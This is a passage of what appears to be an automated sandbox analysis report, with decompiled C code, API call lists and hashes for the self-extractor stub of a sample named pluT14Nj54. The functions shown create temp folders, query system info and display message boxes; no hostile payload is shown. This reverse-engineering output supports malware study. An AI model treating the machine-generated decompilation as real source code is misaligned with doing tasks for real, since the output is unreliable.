                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00391680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E0039171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                    								E0039171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                    								if(E0039681F(_t67) == 0) {
                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t54 = E003967C9(_t74, _t74);
                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(E0039681F(_t67) == 0) {
                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t66 = E003967C9(0, 0);
                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x003944b9
                                                                                                                                                                                                    0x003944c4
                                                                                                                                                                                                    0x003944cb
                                                                                                                                                                                                    0x003944d8
                                                                                                                                                                                                    0x003944e4
                                                                                                                                                                                                    0x003944eb
                                                                                                                                                                                                    0x003944ee
                                                                                                                                                                                                    0x003944ef
                                                                                                                                                                                                    0x003944ef
                                                                                                                                                                                                    0x003944f1
                                                                                                                                                                                                    0x003944f7
                                                                                                                                                                                                    0x003944f8
                                                                                                                                                                                                    0x0039467b
                                                                                                                                                                                                    0x003944fe
                                                                                                                                                                                                    0x00394509
                                                                                                                                                                                                    0x00394518
                                                                                                                                                                                                    0x00394525
                                                                                                                                                                                                    0x00394562
                                                                                                                                                                                                    0x00394568
                                                                                                                                                                                                    0x00394568
                                                                                                                                                                                                    0x0039456b
                                                                                                                                                                                                    0x0039456b
                                                                                                                                                                                                    0x0039456d
                                                                                                                                                                                                    0x0039456e
                                                                                                                                                                                                    0x00394572
                                                                                                                                                                                                    0x00394578
                                                                                                                                                                                                    0x0039457c
                                                                                                                                                                                                    0x003945cb
                                                                                                                                                                                                    0x00394607
                                                                                                                                                                                                    0x00394607
                                                                                                                                                                                                    0x0039460d
                                                                                                                                                                                                    0x00394613
                                                                                                                                                                                                    0x00394617
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039461d
                                                                                                                                                                                                    0x00394623
                                                                                                                                                                                                    0x00394626
                                                                                                                                                                                                    0x00394628
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394628
                                                                                                                                                                                                    0x003945cd
                                                                                                                                                                                                    0x003945cd
                                                                                                                                                                                                    0x003945cf
                                                                                                                                                                                                    0x003945cf
                                                                                                                                                                                                    0x003945d2
                                                                                                                                                                                                    0x003945d2
                                                                                                                                                                                                    0x003945d4
                                                                                                                                                                                                    0x003945d5
                                                                                                                                                                                                    0x003945db
                                                                                                                                                                                                    0x003945de
                                                                                                                                                                                                    0x003945e3
                                                                                                                                                                                                    0x003945e9
                                                                                                                                                                                                    0x003945ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003945f3
                                                                                                                                                                                                    0x003945fd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394602
                                                                                                                                                                                                    0x003945ed
                                                                                                                                                                                                    0x0039457e
                                                                                                                                                                                                    0x0039457e
                                                                                                                                                                                                    0x00394580
                                                                                                                                                                                                    0x00394580
                                                                                                                                                                                                    0x00394583
                                                                                                                                                                                                    0x00394583
                                                                                                                                                                                                    0x00394585
                                                                                                                                                                                                    0x00394586
                                                                                                                                                                                                    0x0039458a
                                                                                                                                                                                                    0x0039458c
                                                                                                                                                                                                    0x0039458f
                                                                                                                                                                                                    0x0039458f
                                                                                                                                                                                                    0x00394591
                                                                                                                                                                                                    0x00394592
                                                                                                                                                                                                    0x0039459b
                                                                                                                                                                                                    0x0039459e
                                                                                                                                                                                                    0x003945a3
                                                                                                                                                                                                    0x003945a9
                                                                                                                                                                                                    0x003945ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003945af
                                                                                                                                                                                                    0x003945af
                                                                                                                                                                                                    0x003945bf
                                                                                                                                                                                                    0x0039462d
                                                                                                                                                                                                    0x00394630
                                                                                                                                                                                                    0x0039463d
                                                                                                                                                                                                    0x0039464e
                                                                                                                                                                                                    0x0039464e
                                                                                                                                                                                                    0x0039463f
                                                                                                                                                                                                    0x00394640
                                                                                                                                                                                                    0x00394647
                                                                                                                                                                                                    0x0039464c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039464c
                                                                                                                                                                                                    0x00394666
                                                                                                                                                                                                    0x0039466d
                                                                                                                                                                                                    0x0039466f
                                                                                                                                                                                                    0x00394675
                                                                                                                                                                                                    0x00394675
                                                                                                                                                                                                    0x003945ad
                                                                                                                                                                                                    0x00394527
                                                                                                                                                                                                    0x0039452e
                                                                                                                                                                                                    0x0039453f
                                                                                                                                                                                                    0x0039453f
                                                                                                                                                                                                    0x00394530
                                                                                                                                                                                                    0x00394531
                                                                                                                                                                                                    0x00394538
                                                                                                                                                                                                    0x0039453d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039453d
                                                                                                                                                                                                    0x00394554
                                                                                                                                                                                                    0x0039455a
                                                                                                                                                                                                    0x0039455a
                                                                                                                                                                                                    0x0039455a
                                                                                                                                                                                                    0x00394525
                                                                                                                                                                                                    0x0039468c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 003945A3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 003945E3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0039460D
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00394630
                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00394666
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0039466F
                                                                                                                                                                                                      • Part of subcall function 0039681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0039686E
                                                                                                                                                                                                      • Part of subcall function 0039681F: GetSystemMetrics.USER32(0000004A), ref: 003968A7
                                                                                                                                                                                                      • Part of subcall function 0039681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003968CC
                                                                                                                                                                                                      • Part of subcall function 0039681F: RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,?,0000000C), ref: 003968F4
                                                                                                                                                                                                      • Part of subcall function 0039681F: RegCloseKey.ADVAPI32(?), ref: 00396902
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$nst0dum
                                                                                                                                                                                                    • API String ID: 3244514340-614204707
                                                                                                                                                                                                    • Opcode ID: 2802ca3966eac15b789227dc3e287f7c6fd44a480db1574c275c4b6fce17decf
                                                                                                                                                                                                    • Instruction ID: d6b86118dc2378952a162c03130faa910d70e7a6ab579a9369b5a50a391157b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2802ca3966eac15b789227dc3e287f7c6fd44a480db1574c275c4b6fce17decf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F951C472900219ABDF239F68DC49FBA7B69EF46300F164195FD49A7241DB32DD06CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E003953A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				CHAR* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                    				_t32 = __edx;
                                                                                                                                                                                                    				_t20 = __ecx;
                                                                                                                                                                                                    				_t29 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0039171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                    					_t34 = _t34 + 0x10;
                                                                                                                                                                                                    					_t29 = _t29 + 1;
                                                                                                                                                                                                    					E00391680(_t32, 0x104, _t20);
                                                                                                                                                                                                    					E0039658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                    					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                    					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                    					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t29 < 0x190) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t30 = 0;
                                                                                                                                                                                                    					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                    						_t30 = 1;
                                                                                                                                                                                                    						DeleteFileA(_t32);
                                                                                                                                                                                                    						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return E00396CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t30 = 1;
                                                                                                                                                                                                    				 *0x398a20 = 1;
                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x003953ac
                                                                                                                                                                                                    0x003953b3
                                                                                                                                                                                                    0x003953b9
                                                                                                                                                                                                    0x003953bb
                                                                                                                                                                                                    0x003953bd
                                                                                                                                                                                                    0x003953bf
                                                                                                                                                                                                    0x003953d1
                                                                                                                                                                                                    0x003953d6
                                                                                                                                                                                                    0x003953e0
                                                                                                                                                                                                    0x003953e2
                                                                                                                                                                                                    0x003953f5
                                                                                                                                                                                                    0x003953fb
                                                                                                                                                                                                    0x00395402
                                                                                                                                                                                                    0x0039540b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395413
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395415
                                                                                                                                                                                                    0x00395416
                                                                                                                                                                                                    0x00395427
                                                                                                                                                                                                    0x0039542a
                                                                                                                                                                                                    0x0039542b
                                                                                                                                                                                                    0x00395434
                                                                                                                                                                                                    0x00395434
                                                                                                                                                                                                    0x0039543a
                                                                                                                                                                                                    0x0039544c
                                                                                                                                                                                                    0x0039544c
                                                                                                                                                                                                    0x00395452
                                                                                                                                                                                                    0x0039545a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039545e
                                                                                                                                                                                                    0x0039545f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039171E: _vsnprintf.MSVCRT ref: 00391750
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003953FB
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395402
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039541F
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039542B
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395434
                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395452
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                    • API String ID: 1082909758-4044985724
                                                                                                                                                                                                    • Opcode ID: ff66e96aa7ea165bad6c91a9345f5442e0640adc31eb6d273e669978b291a2c4
                                                                                                                                                                                                    • Instruction ID: 47602d388222f811fa773a258409cc2a20ca1ffa739a3e9708384dc6d1e35e78
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff66e96aa7ea165bad6c91a9345f5442e0640adc31eb6d273e669978b291a2c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11237170090467DB23AB369C49FEF376DEFC2311F000226F646D2290CE758D8287A2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 522 395467-395484 523 39548a-395490 call 3953a1 522->523 524 39551c-395528 call 391680 522->524 527 395495-395497 523->527 528 39552d-395539 call 3958c8 524->528 529 39549d-3954c0 call 391781 527->529 530 395581-395583 527->530 537 39553b-395545 CreateDirectoryA 528->537 538 39554d-395552 528->538 539 39550c-39551a call 39658a 529->539 540 3954c2-3954d8 GetSystemInfo 529->540 533 39558d-39559d call 396ce0 530->533 542 395577-39557c call 396285 537->542 543 395547 537->543 544 395585-39558b 538->544 545 395554-395557 call 39597d 538->545 539->528 549 3954da-3954dd 540->549 550 3954fe 540->550 542->530 543->538 544->533 551 39555c-39555e 545->551 555 3954df-3954e2 549->555 556 3954f7-3954fc 549->556 552 395503-395507 call 39658a 550->552 551->544 557 395560-395566 551->557 552->539 559 3954f0-3954f5 555->559 560 3954e4-3954e7 555->560 556->552 557->530 561 395568-395575 RemoveDirectoryA 557->561 559->552 560->539 562 3954e9-3954ee 560->562 561->530 562->552
                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00395467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0x3991e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00391680(0x3991e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E003958C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0x399124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00396CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E0039597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0x398a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0x398a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0x399124 = E00396285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x398a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E003953A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0x3991e4;
                                                                                                                                                                                                    				E00391781(0x3991e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0x399a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E0039658A(_t48, 0x104, 0x391140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E0039658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}




















                                                                                                                                                                                                    0x00395472
                                                                                                                                                                                                    0x00395479
                                                                                                                                                                                                    0x00395481
                                                                                                                                                                                                    0x00395484
                                                                                                                                                                                                    0x0039551c
                                                                                                                                                                                                    0x00395521
                                                                                                                                                                                                    0x00395528
                                                                                                                                                                                                    0x0039552d
                                                                                                                                                                                                    0x0039552f
                                                                                                                                                                                                    0x00395539
                                                                                                                                                                                                    0x0039554d
                                                                                                                                                                                                    0x0039554d
                                                                                                                                                                                                    0x00395552
                                                                                                                                                                                                    0x00395585
                                                                                                                                                                                                    0x00395585
                                                                                                                                                                                                    0x0039558b
                                                                                                                                                                                                    0x0039558d
                                                                                                                                                                                                    0x0039559d
                                                                                                                                                                                                    0x0039559d
                                                                                                                                                                                                    0x00395557
                                                                                                                                                                                                    0x0039555e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395560
                                                                                                                                                                                                    0x00395566
                                                                                                                                                                                                    0x00395569
                                                                                                                                                                                                    0x0039556f
                                                                                                                                                                                                    0x0039556f
                                                                                                                                                                                                    0x00395581
                                                                                                                                                                                                    0x00395581
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395581
                                                                                                                                                                                                    0x00395545
                                                                                                                                                                                                    0x0039557c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039557c
                                                                                                                                                                                                    0x00395547
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395547
                                                                                                                                                                                                    0x0039548a
                                                                                                                                                                                                    0x00395490
                                                                                                                                                                                                    0x00395497
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039549d
                                                                                                                                                                                                    0x003954ab
                                                                                                                                                                                                    0x003954b4
                                                                                                                                                                                                    0x003954c0
                                                                                                                                                                                                    0x0039550c
                                                                                                                                                                                                    0x00395511
                                                                                                                                                                                                    0x00395515
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395515
                                                                                                                                                                                                    0x003954c9
                                                                                                                                                                                                    0x003954d6
                                                                                                                                                                                                    0x003954d8
                                                                                                                                                                                                    0x003954fe
                                                                                                                                                                                                    0x00395503
                                                                                                                                                                                                    0x00395507
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395507
                                                                                                                                                                                                    0x003954da
                                                                                                                                                                                                    0x003954dd
                                                                                                                                                                                                    0x003954f7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003954f7
                                                                                                                                                                                                    0x003954df
                                                                                                                                                                                                    0x003954e2
                                                                                                                                                                                                    0x003954f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003954f0
                                                                                                                                                                                                    0x003954e7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003954e9
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003954C9
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039553D
                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039556F
                                                                                                                                                                                                      • Part of subcall function 003953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003953FB
                                                                                                                                                                                                      • Part of subcall function 003953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395402
                                                                                                                                                                                                      • Part of subcall function 003953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039541F
